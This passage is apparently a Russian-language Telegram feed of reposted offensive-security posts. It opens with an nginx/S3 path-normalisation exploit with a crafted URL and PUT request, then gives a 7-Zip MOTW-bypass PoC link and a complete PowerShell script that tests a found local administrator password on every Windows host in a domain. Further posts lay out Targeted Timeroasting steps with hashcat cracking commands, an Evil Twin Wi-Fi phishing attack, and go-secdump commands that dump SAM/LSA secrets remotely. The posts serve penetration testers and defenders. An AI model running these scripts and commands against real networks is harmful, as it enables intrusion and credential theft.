set $s3_host "storage.yandexcloud.net";
rewrite ^(.*)$ /$s3_name$1 break;
proxy_pass https://$s3_host;
Но даже в данном случае конфигурация будет уязвима из-за разницы обработок переданного пути. Правило location и rewrite работают с нормализованным путем, а proxy_pass, в котором указан URI без пути, отправит ненормализованное значение.
Таким образом для эксплуатации уязвимости необходимо отправить запрос, который в нормализованном виде попадет в location /static/, но будет начинаться с бакета, который контролирует атакующий.
http://example.tld/attacker-bucket/..%2Fstatic/foo%0Abar = https://storage.yandexcloud.net/attacker-bucket/..%2Fstatic/foo%0AbarКак и в прошлом примере наличие в имени объекта символов %0A и /../ не помешают эксплуатации, так как это не файловая система и такой объект можно создать PUT запросом. Также, если вы планируете искать подобные мисконфиги блэкбоксом, то нужно учитывать, что ошибки NoSuchObject и NoSuchBucket часто заменяют на дефолтную страницу 404, что может помешать. Обойти это можно вызывая ошибки с кодом, отличным от 404, например отправляя PUT запрос без указания Content-Length.
PUT /attacker-bucket/..%2Fstatic/foo%0Abar HTTP/1.1 Host: example.tld Connection: close
2 063
Repost from GISCYBERTEAM
⚠️ Уязвимость 7-Zip, позволяющая обойти механизм защиты Windows
22 января был опубликован публичный Proof-of-Concept (PoC) для эксплуатации уязвимости CVE-2025-0411. Данная уязвимость позволяет обойти защитный механизм Windows, известный как Mark-of-the-Web (MOTW).
Mark-of-the-Web (MOTW) — это механизм защиты, встроенный в Windows и некоторые программы Microsoft, который помогает защитить пользователей от потенциально небезопасного контента, загружаемого из интернета. Он добавляет специальный флаг (метаданные) к файлам, загруженным из внешних источников, чтобы операционная система и приложения знали, что файл был получен из недоверенного источника.Как работает Mark-of-the-Web? Когда файл (например, документ, исполняемый файл или архив) загружается из интернета с помощью браузера или другой программы, Windows добавляет специальный заголовок в метаданные файла. Этот заголовок сохраняется в виде альтернативного потока данных (Alternate Data Stream), который поддерживается файловой системой NTFS. Например, для файла, загруженного из интернета, MOTW добавляется в виде строки:
[ZoneTransfer]
ZoneId=3
Значение ZoneId определяет источник файла:
ZoneId=0: Мой компьютер (локальная зона, безопасная).
ZoneId=1: Локальная интрасеть.
ZoneId=2: Доверенные сайты.
ZoneId=3: Интернет (недоверенная зона).
ZoneId=4: Ограниченные сайты.
Ссылка на публичный PoC:
https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC2 063
Repost from CyberSecrets
Проверка локальных учетных записей
Представим себе ситуацию, когда во время выполнения проекта мы обнаружили пароль от локального администратора, например, в групповых политиках, или от другой локальной учетной записи. Нам необходимо проверить на каких хостах эта учетная запись есть и валидна. Если под рукой есть «nxc», то проблем нет, а если нет? Можно воспользоваться PowerShell и написать небольшой скрипт для проверки локальной учетной записи.
Скрипт будет запрашивать в домене все активные хосты с операционной системой Windows и выполнять проверку локальной учетной записи. Метод, используемый в данном скрипте для новых версий Windows, основан на обработке ошибки, это связанно с механизмами безопасности внедренных в операционную систему. Ошибки, возникающие при правильном и неправильном пароле, разные. И на основании этого мы можем делать предположение когда пароль является верным. а когда нет.
function Check-LocalCredential{
[CmdletBinding()]
Param (
[Parameter(Mandatory)]
[string]
$UserName,
[Parameter(Mandatory)]
[string]
$Password
)
# Подключаем библиотеку для работы с учетными записями
Add-Type -AssemblyName System.DirectoryServices.AccountManagement -ErrorAction Stop
# В качестве контекста используем машину
$ContextType = [DirectoryServices.AccountManagement.ContextType]::Machine
$searcher = [adsisearcher]'(&(objectCategory=computer)(operatingsystem=*windows*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
$searcher.PageSize = 1000
$comps=$searcher.FindAll()
foreach($comp in $comps)
{
$ComputerName = $comp.Properties.dnshostname.Item(0)
try
{
$PrincipalContext = [System.DirectoryServices.AccountManagement.PrincipalContext]::new($ContextType, $ComputerName)
# Проверям учетные данные
if($PrincipalContext.ValidateCredentials($UserName,$Password))
{
Write-Host -ForegroundColor Green "[+] User $UserName has password $Password on computer $ComputerName"
}
}
catch [UnauthorizedAccessException]
{
Write-Host -ForegroundColor Yellow "[*] User $UserName has password $Password on computer $ComputerName"
continue
}
catch
{
#Write-host -ForegroundColor Red "[!] Error $_.Exception.Message "
continue
}
}
}
Запускаем
Check-LocalCredential -Username Administrator -Password Qwerty123
Зеленый цвет вывода так же покажет, что учетная запись, от имени которой запускается скрипт, является локальным администратором на проверяемом хосте, желтый - пароль для локальной учетной записи верный.
Стоит помнить, что скрипт проверяет валидность учетных данных, но не показывает членство в группе локальных администраторов.
#Powershell #Внутрянка2 063
Repost from RedTeam brazzers
Сегодня я увидел в нескольких каналах информацию про атаку Targeted Timeroasting и очень вдохновился ею.
В двух словах, что такое атака Timeroasting - Это атака, позволяющая получить хеш пароля машинной учетной записи. В целом, мы знаем, что это для нас бесполезно, т.к. пароль машины чаще всего очень длинный и сложный. Но есть сценарии, когда пароль все таки бывает простой и, в совокупности с атакой pre2k, можно построить интересный вектор. Об этом в своем блоге недавно писал @snovvcrash.
Суть атаки Targeted Timeroasting немного в другом: если у нас есть права GenericWrite на объект пользователя, то мы можем превратить этого пользователя в компьютер (что?) и запросить хеш для него. Превратить пользователя в компьютер можно двумя простыми шагами:
1. Меняем userAccountControl на 4096 (UF_WORKSTATION_TRUST_ACCOUNT)
2. Переименовываем sAMAccountName в тоже имя, но со знаком $ на конце
После этих действий сервис времени будет уверен, что это теперь компьютер и отдаст вам хеш.
Хорошо, как можно это использовать?
1 Сценарий.
У нас есть права Domain Admins и не хочется шуметь с помощью атаки DcSync, тогда можно запустить Targeted Timeroasting на всех пользователей и вы получите хеши учеток, которые потом надо будет еще сбрутать.
2 Сценарий.
Захватили учетку HelpDesk. Чаще всего у этой учетки есть права GenericWrite на половину домена. CA в домене нет, значит не провести атаку Shadow Creds. Проведя атаки Targeted Kerberoasting или Targeted AsReproasting мы получим билеты, которые нет возможности побрутить по большим словарям. А с помощью атаки Targeted Timeroasting мы, во-первых, не сильно нашумим на SIEM (не факт, конечно), а во-вторых, получим хеши, которые можно перебирать с чудовещной скоростью.
Остальные сценарии придумайте сами :)
Свежий ресерч про эту атаку вы можете прочитать в блоге. Брутить хеши на hashcat можно так:
git clone https://github.com/hashcat/hashcat && cd hashcat
git checkout 5236f3bd7 && make
./hashcat -m31300
Для атаки Targeted Timeroasting был разработан PowerShell скрипт. Но сегодня я переписал атаку на Python и выложил у себя в репозитории: https://github.com/PShlyundin/TimeSync
Назвал инструмент TimeSync, потому что мне эта атака очень напомнила классический DcSync.2 063
Repost from GISCYBERTEAM
Добрый день, уважаемые подписчики!
В сегодняшней статье мы с Вами рассмотрим атаку на беспроводные сети Wi-Fi типа Evil Twin, осуществляемую через поддельный портал авторизации с целью похищения данных.
Актуальность данного материала обусловлена недостаточным качеством документации по инструментам, таким как eaphammer, которые позволяют проводить подобные атаки.
https://teletype.in/@giscyberteam/captive_portal
#WiFi #SocialEngineering
2 063
Repost from AppSec Journey
Кстати, вполне интересная схема про применение принципов нулевого доверия в рамках тестирования. Интересная она тем, что она практически базируется на принципах Secure by Design, что в целом забавно)) вообще, делать все как надо сразу - может и есть рецепт успеха?
2 063
Repost from Pentest HaT
🔄🖼️ go-secdump v0.4.0
Инструмент для удалённого копирования 🏠 Windows секретов (SAM, LSA) без сохранения на диск
Добавлено:
Added calculation of Kerberos AES Keys for the machine account password. Could be useful when NTLM auth is disabledПример:
./go-secdump --host DC01 --user Administrator --pass Password --local --sam --lsa --dcc2
Relay:
./go-secdump --host 192.168.0.100 -n --relay
Основные опции:
--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>
💻 Home
💻 Download
#soft #golang #redteam #gosecdump
✈️ Pentest HaT